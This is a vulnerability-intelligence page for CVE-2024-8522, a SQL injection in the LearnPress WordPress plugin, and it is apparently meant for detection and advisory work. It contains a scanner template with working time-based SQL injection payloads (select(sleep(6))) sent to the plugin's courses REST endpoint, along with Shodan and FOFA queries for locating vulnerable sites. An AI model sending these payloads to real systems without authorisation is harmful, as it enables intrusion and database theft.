LearnPress WordPress LMS SQL Injection vulnerability in REST AP
Reporter | Title | Published | Views | Family All 10 |
---|---|---|---|---|
Patchstack | WordPress LearnPress Plugin <= 4.2.7 is vulnerable to SQL Injection | 12 Sep 202400:00 | – | patchstack |
NVD | CVE-2024-8522 | 12 Sep 202409:15 | – | nvd |
Cvelist | CVE-2024-8522 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' | 12 Sep 202408:30 | – | cvelist |
Vulnrichment | CVE-2024-8522 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' | 12 Sep 202408:30 | – | vulnrichment |
CVE | CVE-2024-8522 | 12 Sep 202409:15 | – | cve |
0day.today | WordPress LMS 4.2.7 SQL Injection Vulnerability | 23 Sep 202400:00 | – | zdt |
Packet Storm | WordPress LMS 4.2.7 SQL Injection | 19 Sep 202400:00 | – | packetstorm |
Metasploit | WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529) | 14 Oct 202416:15 | – | metasploit |
Rapid7 Blog | Metasploit Weekly Wrap-Up 10/18/2024 | 18 Oct 202418:14 | – | rapid7blog |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (September 9, 2024 to September 15, 2024) | 19 Sep 202415:42 | – | wordfence |
id: CVE-2024-8522
info:
name: LearnPress – WordPress LMS - SQL Injection
author: pdresearch,iamnoooob,rootxharsh
severity: critical
description: |
The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://github.com/advisories/GHSA-3w3r-r6g6-w8x5
- https://nvd.nist.gov/vuln/detail/CVE-2024-8522
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-8522
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 4
vendor: thimpress
product: learnpress
shodan-query: html:"/wp-content/plugins/learnpress"
fofa-query: body="/wp-content/plugins/learnpress"
tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/learnpress")'
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_1>=6'
- 'duration_2>=6'
# digest: 4a0a00473045022100e13910450d93edce3729057fbab77394fbf598f2e7f34dac1e8055fd7caa4c2b02204bd42a4619f499cada5715d49dd76134ff2db4bec0df4de07bd210c21beda516:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo